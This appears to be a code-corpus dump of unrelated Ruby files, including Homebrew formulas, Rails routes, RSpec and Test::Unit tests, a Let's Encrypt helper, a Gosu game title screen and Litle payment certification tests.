assert_equal(Nokogiri::XML::DocumentFragment.parse("<div>a</div>").to_s, fragment.to_s)
end
end
end
describe "#path" do
it "should return '?'" do
# see https://github.com/sparklemotion/nokogiri/issues/2250
# this behavior is clearly undesirable, but is what libxml <= 2.9.10 returned, and so we
# do this for now to preserve the behavior across libxml2 versions.
xml = <<~EOF
<root1></root1>
<root2></root2>
EOF
frag = Nokogiri::XML::DocumentFragment.parse(xml)
assert_equal "?", frag.path
# # TODO: we should circle back and fix both the `#path` behavior and the `#xpath`
# # behavior so we can round-trip and get the DocumentFragment back again.
# assert_equal(frag, frag.at_xpath(doc.path)) # make sure we can round-trip
end
end
end
end
end
end
| 36.897959 | 119 | 0.577848 |
18ccc6e6f8ec12a4d3599c15dba78934ebdfdaa8 | 1,615 | class GitNow < Formula
desc "Light, temporary commits for git"
homepage "https://github.com/iwata/git-now"
url "https://github.com/iwata/git-now.git",
:tag => "v0.1.1.0",
:revision => "a07a05893b9ddf784833b3d4b410c843633d0f71"
head "https://github.com/iwata/git-now.git"
bottle do
cellar :any_skip_relocation
sha256 "ad78d8ab5cf008375bdeb03f0b1289733fba33fac43535f38117e5d8af50f06b" => :high_sierra
sha256 "ffde5161accdd2bab777e610302f858e1bf9e17f0ee1a41fb4e7b33a0d9f5eb4" => :sierra
sha256 "7126e867e543659b9750041412e737407fb94f9dbb38fea1edf16cec8027aa64" => :el_capitan
sha256 "748cd8691ad94b407f892ffa7f8e12c183b7326208efd9ac6dafbe1b8fda9565" => :yosemite
sha256 "c19eda078da8974bde40ee07eac5701e9295d56bd59a6d18ea21c3d337b50e02" => :mavericks
sha256 "df4b4b7da7d3f0dd563858b126bece61cd99ed697521000b5c593c47753d7a54" => :x86_64_linux # glibc 2.19
end
depends_on "gnu-getopt"
def install
# Fix bashism in git-now-add when executed by git-now
inreplace "git-now", "#!/bin/sh", "#!/bin/bash"
system "make", "prefix=#{libexec}", "install"
(bin/"git-now").write <<-EOS.undent
#!/bin/sh
PATH=#{Formula["gnu-getopt"].opt_bin}:$PATH #{libexec}/bin/git-now "$@"
EOS
zsh_completion.install "etc/_git-now"
end
test do
(testpath/".gitconfig").write <<-EOS.undent
[user]
name = Real Person
email = [email protected]
EOS
touch "file1"
system "git", "init"
system "git", "add", "file1"
system bin/"git-now"
assert_match "from now", shell_output("git log -1")
end
end
| 32.959184 | 107 | 0.705263 |
7a7f8052b8f314afc195524e5057a6edbe7e57bd | 983 | Rails.application.routes.draw do
devise_for :users
get 'get_user' => 'users#get_user'
get 'render_post' => 'posts#render_post'
get 'active_chatrooms' => 'chatrooms#active_chatrooms'
resources :users do
resources :posts do
resources :comments, :only => [:show, :create, :destroy, :edit, :update, :new] do
member do
post 'like'
end
end
member do
get 'show_comments'
post 'like'
end
end
resources :friendships, only: [:index, :destroy, :update, :create]
end
resources :chatrooms do
resources :messages
member do
get 'del_from_sessions'
get 'open_chat'
end
end
devise_scope :user do
authenticated :user do
#root 'users#index', as: :authenticated_root
root 'home#index', as: :authenticated_root
get 'home/autocomplete_user_username'
end
unauthenticated do
root 'devise/sessions#new', as: :unauthenticated_root
end
end
end
| 23.404762 | 87 | 0.639878 |
bb27015ebfe496fb8597f3275343129b3049d2d5 | 551 | # frozen_string_literal: true
require 'tilt'
# Load tilt/haml only when haml is available
begin
require 'haml'
rescue LoadError
else
require 'tilt/haml'
end
require_relative 'engine'
module Faml
class Tilt < Tilt::Template
def prepare
filename = nil
if file
filename = File.expand_path(file)
end
@code = Engine.new(options.merge(filename: filename)).call(data)
end
def precompiled_template(_locals = {})
@code
end
end
::Tilt.register(Tilt, 'haml')
::Tilt.register(Tilt, 'faml')
end
| 18.366667 | 70 | 0.669691 |
280a2c72c3c3d921eee04036d3ce957767747eee | 1,150 | # encoding: UTF-8
# Copyright 2012 Twitter, Inc
# http://www.apache.org/licenses/LICENSE-2.0
require 'spec_helper'
include TwitterCldr::Formatters
describe CurrencyFormatter do
describe "#format" do
before(:each) do
@formatter = CurrencyFormatter.new(:locale => :msa)
end
it "should use a dollar sign when no other currency symbol is given (and default to a precision of 2)" do
@formatter.format(12).should == "$12.00"
end
it "handles negative numbers" do
# yes, the parentheses really are part of the format, don't worry about it
@formatter.format(-12).should == "-($12.00)"
end
it "should use the specified currency symbol when specified" do
# S/. is the symbol for the Peruvian Nuevo Sol, just in case you were curious
@formatter.format(12, :currency => "S/.").should == "S/.12.00"
end
it "should use the currency symbol for the corresponding currency code" do
@formatter.format(12, :currency => "PEN").should == "S/.12.00"
end
it "overrides the default precision" do
@formatter.format(12, :precision => 3).should == "$12.000"
end
end
end | 30.263158 | 109 | 0.666087 |
084c35a9623408dbf84e49f3d311b3cd045104c1 | 1,644 | class Asio < Formula
desc "Cross-platform C++ Library for asynchronous programming"
homepage "https://think-async.com/Asio"
url "https://downloads.sourceforge.net/project/asio/asio/1.14.0%20%28Stable%29/asio-1.14.0.tar.bz2"
sha256 "2e1be1a518a568525f79b5734d13731b6b4e4399ec576a0961db6e2d86112973"
head "https://github.com/chriskohlhoff/asio.git"
bottle do
cellar :any
sha256 "3f2c8ab0aadadda4d4707b834787d0c02841a31cec763b4c4d32ca3f859bd314" => :catalina
sha256 "7be9a1e39bbd3fa59059fc9d8d98f7f43520da052cf245f195bbdd325ec1a8ec" => :mojave
sha256 "ea18bc6cca19d15ff019a98be7a9c31c34e477b5daac54ce7379f02a6635247f" => :high_sierra
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "[email protected]"
def install
ENV.cxx11
if build.head?
cd "asio"
system "./autogen.sh"
else
system "autoconf"
end
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}",
"--with-boost=no"
system "make", "install"
pkgshare.install "src/examples"
end
test do
found = [pkgshare/"examples/cpp11/http/server/http_server",
pkgshare/"examples/cpp03/http/server/http_server"].select(&:exist?)
raise "no http_server example file found" if found.empty?
pid = fork do
exec found.first, "127.0.0.1", "8080", "."
end
sleep 1
begin
assert_match /404 Not Found/, shell_output("curl http://127.0.0.1:8080")
ensure
Process.kill 9, pid
Process.wait pid
end
end
end
| 30.444444 | 101 | 0.666058 |
ed6af368434c8118252a2558831e4196a7961535 | 1,953 | # -*- encoding: utf-8 -*-
$LOAD_PATH.unshift File.expand_path("../lib", __FILE__)
require "cucumber/platform"
Gem::Specification.new do |s|
s.name = 'cucumber'
s.version = Cucumber::VERSION
s.authors = ["Aslak Hellesøy"]
s.description = 'Behaviour Driven Development with elegance and joy'
s.summary = "cucumber-#{s.version}"
s.email = '[email protected]'
s.license = 'MIT'
s.homepage = "http://cukes.info"
s.platform = Gem::Platform::RUBY
s.required_ruby_version = ">= 1.9.3"
s.add_dependency 'cucumber-core', '~> 0.2'
s.add_dependency 'builder', '>= 2.1.2'
s.add_dependency 'diff-lcs', '>= 1.1.3'
s.add_dependency 'gherkin', '~> 2.12'
s.add_dependency 'multi_json', '>= 1.7.5', '< 2.0'
s.add_dependency 'multi_test', '>= 0.0.2'
s.add_development_dependency 'aruba', '~> 0.5.3'
s.add_development_dependency 'json', '~> 1.7'
s.add_development_dependency 'nokogiri', '~> 1.5'
s.add_development_dependency 'rake', '>= 0.9.2'
s.add_development_dependency 'rspec', '>= 2.13'
s.add_development_dependency 'simplecov', '>= 0.6.2'
s.add_development_dependency 'coveralls', '~> 0.7'
s.add_development_dependency 'syntax', '>= 1.0.0'
# For Documentation:
s.add_development_dependency 'bcat', '~> 0.6.2'
s.add_development_dependency 'kramdown', '~> 0.14'
s.add_development_dependency 'yard', '~> 0.8.0'
# Needed for examples (rake examples)
s.add_development_dependency 'capybara', '>= 2.1'
s.add_development_dependency 'rack-test', '>= 0.6.1'
s.add_development_dependency 'sinatra', '>= 1.3.2'
s.rubygems_version = ">= 1.6.1"
s.files = `git ls-files`.split("\n").reject {|path| path =~ /\.gitignore$/ }
s.test_files = `git ls-files -- {spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.rdoc_options = ["--charset=UTF-8"]
s.require_path = "lib"
end
| 39.06 | 89 | 0.640553 |
5d8f3789555b2805f8ba11056ae7e33e863577f1 | 2,620 | # frozen_string_literal: true
require 'openssl'
require 'acme-client'
require 'redis'
require 'letsencrypt/railtie'
require 'letsencrypt/engine'
require 'letsencrypt/configuration'
require 'letsencrypt/logger_proxy'
require 'letsencrypt/redis'
# :nodoc:
module LetsEncrypt
# Production mode API Endpoint
ENDPOINT = 'https://acme-v02.api.letsencrypt.org/directory'
# Staging mode API Endpoint, the rate limit is higher
# but got invalid certificate for testing
ENDPOINT_STAGING = 'https://acme-staging-v02.api.letsencrypt.org/directory'
class << self
# Create the ACME Client to Let's Encrypt
def client
@client ||= ::Acme::Client.new(
private_key: private_key,
directory: directory
)
end
def private_key
@private_key ||= OpenSSL::PKey::RSA.new(load_private_key)
end
def load_private_key
return ENV['LETSENCRYPT_PRIVATE_KEY'] if config.use_env_key
return File.open(private_key_path) if File.exist?(private_key_path)
generate_private_key
end
# Get current using Let's Encrypt endpoint
def directory
@endpoint ||= config.use_staging? ? ENDPOINT_STAGING : ENDPOINT
end
# Register a Let's Encrypt account
#
# This is required a private key to do this,
# and Let's Encrypt will use this private key to
# connect with domain and assign the owner who can
# renew and revoked.
def register(email)
account = client.new_account(contact: "mailto:#{email}", terms_of_service_agreed: true)
logger.info "Successfully registered private key with address #{email}"
account.kid # TODO: Save KID
true
end
def private_key_path
config.private_key_path || Rails.root.join('config', 'letsencrypt.key')
end
def generate_private_key
key = OpenSSL::PKey::RSA.new(4096)
File.open(private_key_path, 'w') { |f| f.write(key.to_s) }
logger.info "Created new private key for Let's Encrypt"
key
end
def logger
@logger ||= LoggerProxy.new(Rails.logger, tags: ['LetsEncrypt'])
end
# Config how to Let's Encrypt works for Rails
#
# LetsEncrypt.config do |config|
# # Always use production mode to connect Let's Encrypt API server
# config.use_staging = false
# end
def config(&block)
@config ||= Configuration.new
instance_exec(@config, &block) if block_given?
@config
end
# @api private
def table_name_prefix
'letsencrypt_'
end
def certificate_model
@certificate_model ||= config.certificate_model.constantize
end
end
end
| 27.578947 | 93 | 0.683206 |
39cb01dbdee74eb0eb9ccadcaf4bbfa06a0f925f | 5,866 | class Title
def initialize(window)
@window = window
@cursor = 0
@white = 0xffffffff
@black = 0xff000000
@mode = :title # :title, :white_fade
@animation = Gosu::Image::load_tiles(window, "media/sprites/ruby.png", 16, 16, true)
calc_animation
@corn = Gosu::Image::load_tiles(window, "media/sprites/sapphire_corn.png", 16, 16, true)
@pumpkin = Gosu::Image::load_tiles(window, "media/sprites/emerald_pumpkin.png", 16, 16, true)
@tomato = Gosu::Image::load_tiles(window, "media/sprites/amethyst_tomato.png", 16, 16, true)
@font = Gosu::Font.new(@window, "Courier", 12)
@menu_list = ["New Game", "Quit"]
@rubys = Array.new
@crops = Array.new
@ruby_size = 2.0
@ruby_x, @ruby_y = 352, 352
calc_ruby_xy
@x, @y, @h, @w, @b = 247, 500, 114, 210, 5
end
def interact
if @cursor == 0
fade_out
@mode = :white_fade
else
@window.close_game
end
end
def move_up
@cursor == 0 ? @cursor = 1 : @cursor -= 1
end
def move_down
@cursor == 1 ? @cursor = 0 : @cursor += 1
end
def start_game
@window.sounds.effect(:fade_out,:start_game)
@window.effect(:white_fade)
@window.mode = :field
end
def update
case @mode
when :white_fade
if @delta <= @final_color
@delta += 16777216 * 8 # 1/256 for alpha column!
else
start_game
end
else # :title
calc_animation
if rand(100) < 4 && @rubys.size < 250
@rubys.push(TitleImage.new(@animation))
if @ruby_size <= 20
@ruby_size += 0.1
calc_ruby_xy
end
end
if rand(100) < 4 && @crops.size < 250
@crops.push(TitleCrop.new([@corn, @tomato, @pumpkin].sample))
end
@rubys.each {|ruby| ruby.move }
@crops.each {|crop| crop.grow }
end
end
def calc_ruby_xy
@ruby_x = @ruby_y = 352 - 8 * @ruby_size
end
def calc_animation
@current_anim =
case Gosu::milliseconds / 2000 % 4
when 0 then [@animation[8],@animation[9],@animation[10],@animation[11]]
when 1 then [@animation[0],@animation[1],@animation[2],@animation[3]]
when 2 then [@animation[12],@animation[13],@animation[14],@animation[15]]
when 3 then [@animation[4],@animation[5],@animation[6],@animation[7]]
end
end
def fade_out
@final_color = 0xFFFFFFFF
@delta = 0x00FFFFFF
@window.set_timer(60)
end
def draw
# white background
@window.draw_quad(0, 0, @black, 704, 0, @black, 0, 704, @black, 704, 704, @black, 0)
#text
@font.draw("GemFarm", 282, 50, 2, 4.0, 4.0, @white)
@font.draw("A Farming Adventure", 162, 100, 2, 4.0, 4.0, @white)
# picture
img = @current_anim[Gosu::milliseconds / 200 % 4]
img.draw(@ruby_x, @ruby_x, 2, @ruby_size, @ruby_size)
@rubys.each {|ruby| ruby.draw }
@crops.each {|crop| crop.draw }
# menu with two options (new game/quit)
@window.draw_quad(@x - @b, @y - @b, @white, @x + @w + @b, @y - @b, @white, @x - @b, @y + @h + @b, @white, @x + @w + @b, @y + @h + @b, @white, 4) #black box
@window.draw_quad(@x, @y, @black, @x + @w, @y, @black, @x, @y + @h, @black, @x + @w, @y + @h, @black, 5) # white box
@menu_list.each_with_index do |text, index|
@font.draw("#{text}", @x + 30 , @y + 10 + (index * 52), 6, 4.0, 4.0, @white)
end
@window.draw_triangle(@x + 5, @cursor * 52 + 20 + @y, @white, @x + 5, @cursor * 52 + 40 + @y, @white, @x + 22, @cursor * 52 + 30 + @y, @white, 7) # cursor
case @mode
# fade
when :white_fade then @window.draw_quad(0, 0, @delta, 704, 0, @delta, 0, 704, @delta, 704, 704, @delta, 10)
end
end
end
class TitleCrop
def initialize(animation)
@animation = animation
@current_anim = [@animation[0],@animation[1]]
@stage = 0
@color = Gosu::Color.new(0xff000000)
@color.red = rand(256 - 40) + 40
@color.green = rand(256 - 40) + 40
@color.blue = rand(256 - 40) + 40
@ratio = rand(11) / 10.00 + 3.5
@speed = rand(500) + 150
@x = rand * 704
@y = rand * 704
end
def grow
if rand(@speed / 5) < 2
@stage == 3 ? @stage = 0 : @stage += 1
@current_anim =
case @stage
when 0 then [@animation[0],@animation[1]]
when 1 then [@animation[2],@animation[3]]
when 2 then [@animation[4],@animation[5]]
when 3 then [@animation[6],@animation[7]]
end
end
end
def draw
img = @current_anim[Gosu::milliseconds / @speed % 2]
img.draw(@x, @y, 1, @ratio, @ratio, @color, :add)
end
end
class TitleImage
def initialize(animation)
@animation = animation
@color = Gosu::Color.new(0xff000000)
@color.red = rand(256 - 40) + 40
@color.green = rand(256 - 40) + 40
@color.blue = rand(256 - 40) + 40
@ratio = rand(11) / 10.00 + 3.5
@speed = rand(500) + 150
@x = rand * 704
@y = rand * 704
@direction = :down
@down_anim = [@animation[0],@animation[1],@animation[2],@animation[3]]
@left_anim = [@animation[4],@animation[5],@animation[6],@animation[7]]
@up_anim = [@animation[8],@animation[9],@animation[10],@animation[11]]
@right_anim = [@animation[12],@animation[13],@animation[14],@animation[15]]
end
def move
if rand(@speed / 5) < 2
case rand(0..3)
when 0
@x += 8 * @ratio
@direction = :right
when 1
@x -= 8 * @ratio
@direction = :left
when 2
@y -= 8 * @ratio
@direction = :up
when 3
@y += 8 * @ratio
@direction = :down
end
end
end
def draw
cur_anim =
case @direction
when :right then @right_anim
when :left then @left_anim
when :up then @up_anim
when :down then @down_anim
end
img = cur_anim[Gosu::milliseconds / @speed % 4]
img.draw(@x - img.width, @y - img.height, 1, @ratio, @ratio, @color, :add)
end
end | 29.626263 | 159 | 0.571258 |
f7262d5d05a4e9a2616ccae87a2b4003fb9fd6d1 | 1,152 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-apigateway'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Amazon API Gateway'
spec.description = 'Official AWS Ruby gem for Amazon API Gateway. This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-apigateway',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-apigateway/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.48.2')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
| 38.4 | 112 | 0.663194 |
287ea0a769943f4890937d46d421e88886855894 | 4,005 | require 'spec_helper'
describe HdfsEntryPresenter, :type => :view do
let(:hdfs_data_source) { hdfs_data_sources(:hadoop) }
let(:options) {{}}
let(:presenter) { HdfsEntryPresenter.new(entry, view, options) }
describe "#to_hash" do
let(:hash) { presenter.to_hash }
shared_examples_for :rendering_activities do
let(:options) { {activity_stream: true} }
it 'renders no tags' do
hash.should_not have_key(:tags)
end
end
context "for a directory" do
let(:entry) do
hdfs_data_source.hdfs_entries.create!({
:path => "/data2",
:modified_at => "2010-10-20 10:11:12",
:size => '10',
:is_directory => 'true',
:content_count => 1,
:hdfs_data_source => hdfs_data_source
}, :without_protection => true)
end
before do
mock(entry).ancestors { [{:name => "foo", :id => 1}] }
stub(entry).entries { [] }
end
it "includes the fields" do
hash[:id].should == entry.id
hash[:name].should == "data2"
hash[:path].should == "/"
hash[:last_updated_stamp].should == "2010-10-20T10:11:12Z"
hash[:size].should == 10
hash[:is_deleted].should be_false
hash[:is_dir].should be_true
hash[:count].should be(1)
hash[:tags].should be_an Array
hash[:hdfs_data_source][:id].should == hdfs_data_source.id
hash[:hdfs_data_source][:name].should == hdfs_data_source.name
hash[:ancestors].should == [{:name => "foo", :id => 1}]
hash.should_not have_key(:contents)
hash.should_not have_key(:entries)
end
context "when deep option is specified" do
let(:options) {{:deep => true}}
it "includes entries" do
hash[:id].should == entry.id
hash[:entries].should == []
end
end
it_behaves_like :rendering_activities
end
context "for a file" do
let(:entry) do
hdfs_data_source.hdfs_entries.create!({
:path => "/data.file",
:modified_at => "2010-10-20 10:11:12",
:size => '10',
:is_directory => 'false',
:content_count => 1,
:hdfs_data_source => hdfs_data_source
}, :without_protection => true)
end
before do
mock(entry).ancestors { [{:name => "foo", :id => 1}] }
stub(entry).contents { "Content" }
end
it "includes the fields" do
hash[:id].should == entry.id
hash[:name].should == "data.file"
hash[:path].should == "/"
hash[:last_updated_stamp].should == "2010-10-20T10:11:12Z"
hash[:size].should == 10
hash[:is_deleted].should be_false
hash[:is_dir].should be_false
hash[:hdfs_data_source][:id].should == hdfs_data_source.id
hash[:hdfs_data_source][:name].should == hdfs_data_source.name
hash[:ancestors].should == [{:name => "foo", :id => 1}]
hash.should_not have_key(:contents)
hash.should_not have_key(:entries)
end
context "when deep option is specified" do
let(:options) {{:deep => true}}
it "includes contents" do
hash[:id].should == entry.id
hash[:contents].should == "Content"
end
end
it_behaves_like :rendering_activities
end
end
describe "complete_json?" do
context "with a file" do
let(:entry) { hdfs_entries(:hdfs_file) }
it "is true" do
presenter.complete_json?.should be_true
end
end
context "with a directory" do
let(:entry) { hdfs_entries(:directory) }
context "when deep is not specified" do
it "is not true" do
presenter.complete_json?.should_not be_true
end
end
context "when deep is specified" do
let(:options) { {:deep => true} }
it "is true" do
presenter.complete_json?.should be_true
end
end
end
end
end
| 29.021739 | 70 | 0.571036 |
38e4c161e604238f4f86176e027e77bf25c2e1c0 | 295 | json.extract! @comment, :id
json.body h(@comment.body)
json.created_at l(@comment.created_at)
json.user do
json.display_name @comment.user.display_name
json.image do
json.thumbnail do
json.src @comment.user.image.thumbnail.url
end
end
json.url user_path(@comment.user)
end
| 22.692308 | 48 | 0.738983 |
ac3611ac005f3aacddc67963a6862114d3a0c6a9 | 9,802 | require File.expand_path("../../../lib/LitleOnline",__FILE__)
require 'test/unit'
module LitleOnline
class Litle_certTest5 < Test::Unit::TestCase
@@merchant_hash = {
'reportGroup'=>'Planets',
'url'=> 'https://payments.vantivprelive.com/vap/communicator/online',
'id'=>'test'
}
# def test_50
# customer_hash = {
# 'orderId' => '50',
# 'accountNumber' => '4457119922390123'
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.register_token_request(hash)
# assert_equal('445711', token_response.registerTokenResponse.bin)
# assert_equal('VI', token_response.registerTokenResponse['type'])
# assert_equal('801', token_response.registerTokenResponse.response)
# assert_equal('1111222233330123', token_response.registerTokenResponse.litleToken)
# assert_equal('Account number was successfully registered', token_response.registerTokenResponse.message)
# end
def test_51
customer_hash = {
'orderId' => '51',
'accountNumber' => '4457119999999999'
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('820', token_response.registerTokenResponse.response)
assert_equal('Credit card number was invalid', token_response.registerTokenResponse.message)
end
def test_52
customer_hash = {
'orderId' => '52',
'accountNumber' => '4457119922390123'
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('445711', token_response.registerTokenResponse.bin)
assert_equal('VI', token_response.registerTokenResponse['type'])
assert_equal('802', token_response.registerTokenResponse.response)
cardString = "" + token_response.registerTokenResponse.litleToken
assert_equal('0123', cardString[12..15])
assert_equal('Account number was previously registered', token_response.registerTokenResponse.message)
end
# def test_53
# customer_hash = {
# 'orderId' => '53',
# 'echeckForToken'=>{'accNum'=>'1099999998','routingNum'=>'114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.register_token_request(hash)
# assert_equal('EC', token_response.registerTokenResponse['type'])
# assert_equal('998', token_response.registerTokenResponse.eCheckAccountSuffix)
# assert_equal('801', token_response.registerTokenResponse.response)
# assert_equal('Account number was successfully registered', token_response.registerTokenResponse.message)
# assert_equal('111922223333000998', token_response.registerTokenResponse.litleToken)
# end
def test_54
customer_hash = {
'orderId' => '54',
'echeckForToken'=>{'accNum'=>'1022222102','routingNum'=>'1145_7895'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('900', token_response.registerTokenResponse.response)
# assert_equal('Invalid bank routing number', token_response.registerTokenResponse.message)
end
# def test_55
# customer_hash = {
# 'orderId' => '55',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'card' => {'number' => '5435101234510196', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.authorization(hash)
# assert_equal('000', token_response.authorizationResponse.response)
# assert_equal('Approved', token_response.authorizationResponse.message)
# assert_equal('801', token_response.authorizationResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.authorizationResponse.tokenResponse.tokenMessage)
# assert_equal('MC', token_response.authorizationResponse.tokenResponse['type'])
# assert_equal('543510', token_response.authorizationResponse.tokenResponse.bin)
# end
def test_56
customer_hash = {
'orderId' => '56',
'amount' => '15000',
'orderSource' => 'ecommerce',
'card' => {'number' => '5435109999999999', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('301', token_response.authorizationResponse.response)
# assert_equal('Invalid account number', token_response.authorizationResponse.message)
end
def test_57
customer_hash = {
'orderId' => '57',
'amount' => '15000',
'orderSource' => 'ecommerce',
'card' => {'number' => '5435101234510196', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('000', token_response.authorizationResponse.response)
assert_equal('Approved', token_response.authorizationResponse.message)
assert_equal('802', token_response.authorizationResponse.tokenResponse.tokenResponseCode)
assert_equal('Account number was previously registered', token_response.authorizationResponse.tokenResponse.tokenMessage)
assert_equal('MC', token_response.authorizationResponse.tokenResponse['type'])
assert_equal('543510', token_response.authorizationResponse.tokenResponse.bin)
end
def test_59
customer_hash = {
'orderId' => '59',
'amount' => '15000',
'orderSource' => 'ecommerce',
'token' => {'litleToken' => '1111000100092332', 'expDate' => '1121'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('822', token_response.authorizationResponse.response)
assert_equal('Token was not found', token_response.authorizationResponse.message)
end
def test_60
customer_hash = {
'orderId' => '60',
'amount' => '15000',
'orderSource' => 'ecommerce',
'token' => {'litleToken' => '1112000100000085', 'expDate' => '1121'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('823', token_response.authorizationResponse.response)
assert_equal('Token was invalid', token_response.authorizationResponse.message)
end
# def test_61
# customer_hash = {
# 'orderId' => '61',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999003', 'routingNum' => '114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('003', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333444003', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
# def test_62
# customer_hash = {
# 'orderId' => '62',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999999', 'routingNum' => '114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('999', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333444999', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
# def test_63
# customer_hash = {
# 'orderId' => '63',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999999', 'routingNum' => '214567892'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('999', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333555999', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
end
end | 47.352657 | 131 | 0.677311 |
f88b6fc571e69b8accd01b0a8dc0d36c174c5307 | 7,358 | class UsageError < RuntimeError; end
# Raised when a command that needs a formula name is given none.
class FormulaUnspecifiedError < UsageError; end
# Raised when a command that needs a keg name is given none.
class KegUnspecifiedError < UsageError; end
# Raised when exactly one installed version of +name+ was expected but the
# Cellar contains several.
class MultipleVersionsInstalledError < RuntimeError
  attr_reader :name
  def initialize name
    @name = name
    super "#{name} has multiple installed versions"
  end
end
# Raised when a path that should point at a keg does not.
class NotAKegError < RuntimeError; end
# Raised when no keg named +name+ exists under HOMEBREW_CELLAR.
class NoSuchKegError < RuntimeError
  attr_reader :name
  def initialize name
    @name = name
    super "No such keg: #{HOMEBREW_CELLAR}/#{name}"
  end
end
# Raised when a formula attribute (e.g. url, homepage) fails validation.
# The offending attribute name is exposed via #attr; the message includes
# the rejected value unless it is empty.
class FormulaValidationError < StandardError
  attr_reader :attr

  def initialize(attr, value)
    @attr = attr
    message = "invalid attribute: #{attr}"
    message += " (#{value.inspect})" unless value.empty?
    super(message)
  end
end
# Raised when a formula's specification is malformed.
class FormulaSpecificationError < StandardError; end
# Raised when the requested formula cannot be found, either in core or in
# a tapped repository.
class FormulaUnavailableError < RuntimeError
  attr_reader :name
  # Set when the formula was requested as a dependency of another formula.
  attr_accessor :dependent
  def dependent_s
    "(dependency of #{dependent})" if dependent and dependent != name
  end
  def to_s
    # $1/$2/$3 are the tap user, tap repo and formula name captured by the
    # =~ match against HOMEBREW_TAP_FORMULA_REGEX on the line below.
    if name =~ HOMEBREW_TAP_FORMULA_REGEX then <<-EOS.undent
      No available formula for #$3 #{dependent_s}
      Please tap it and then try again: brew tap #$1/#$2
      EOS
    else
      "No available formula for #{name} #{dependent_s}"
    end
  end
  def initialize name
    @name = name
  end
end
# Raised when another Homebrew process already holds the lock for +name+.
class OperationInProgressError < RuntimeError
  def initialize name
    # NOTE: String#undent is a Homebrew extension defined elsewhere, not
    # part of the Ruby standard library.
    message = <<-EOS.undent
      Operation already in progress for #{name}
      Another active Homebrew process is already using #{name}.
      Please wait for it to finish or terminate it to continue.
      EOS
    super message
  end
end
# Namespace for Homebrew-internal error types.
module Homebrew
  # Base class for all errors raised while installing a formula; retains
  # the formula being installed so rescuers can report it.
  class InstallationError < RuntimeError
